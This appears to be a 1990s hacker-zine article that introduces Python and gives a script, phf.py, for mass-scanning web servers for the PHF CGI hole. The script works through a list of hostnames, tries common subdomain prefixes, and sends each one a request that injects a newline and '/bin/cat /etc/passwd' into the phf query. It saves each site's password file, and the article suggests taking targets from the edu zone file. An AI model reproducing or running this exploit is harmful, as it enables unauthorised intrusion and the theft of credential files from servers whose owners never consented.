More PHF Fun
by ChezeHead
By now most of you should be familiar at least wit the "PHF hole" due to file permissions on many web servers. Quite possibly you may have even tried some of the nifty tricks possible on your local server to see if you were at risk. But I am sure that most of you were quite disgusted as you went out to try this new-found hacking trick and had a hard time finding a site to try this nifty backdoor on. This little script has two goals: to give a handy tool for finding sites with the PHF backdoor, and to introduce Python to the general hacking population. Python is fast becoming the network "quick hack" language of choice by the hacking population. The only problem is that most hackers don't realize it exists! The Python script I have included will hopefully show how easy powerful network applications can be programmed.
The script also solves the problem of finding sites with the PHF bug. If one had the inclination, after a quick trip to rs.internic.net the 'edu.zone' file could be parsed quite easily into a file compatible with the script. This has been left as a trivial exercise for the reader. This script should work with the Win95 version of Python with little or no change.
#!/usr/bin/python # # Web Searcher for passwd files using 'phf' permissions hole... # # Give it a file with one address per line and it will search # certain combinations of the address, i.e., www.adress... # # A parsed zone file from Internic would probably be a good starting # place! # # I threw this script together pretty quickly so please excuse the ugly # code... # # ChezeHead 11/25/96 # # Combination list of prefixes to try... combos='', 'www', 'www.cs.', 'www.math.', 'www.physics.', 'www.engr.', 'www.lib.', 'www.cis.' # Think of an import like a C #include import string import urllib import os # Function to convert . to _ for systems that can't use multiple .'s def convert_link(link): temp="" for u in link: if u == '.': u = '_' temp = temp+u return temp # get filename info, and open the file filename = raw_input("Filename to Use? ") logfilename = raw_input("Logname to Use? ") output_path = raw_input("Output Path ") print "Using filename "+filename+"..." print "Adding to Logfile "+logfilename+"..." hostfile = open(filename, 'r') logfile = open(output_path + logfilename, 'a') # My coding is a bit messy here but it does the job flag = 0 while not flag: link = string.strip(hostfile.readline()) if link != '': for u in combos: thislink = u+link print "Trying host: "+thislink # Attempt to retrieve the URL try: tempfile = urllib.urlretrieve("http://"+thislink+"/cgi-bin/phf?Jserver="\+"thislink%0A/bin/cat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Q"\+"nickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhighschool=&Q"\+"slip=HTTP/1.0") except: print "Host "+thislink+" error connecting" logfile.write("error connecting: ") # For compressing the retrieved files you # could use lines like these... # os.system("/bin/compress "+tempfile[0]) # os.rename(tempfile[0]+".gz", output_path+ # convert_link(thislink+".gz")) try: os.rename(tempfile[0], output_path+convert_link(thislink)) except: print "tempfile doesn't exist" logfile.write(thislink+"\r\n") if link == '': flag = 1 # If you wish you could now do some # clean up or extra parsing of the # files...Code: phf.py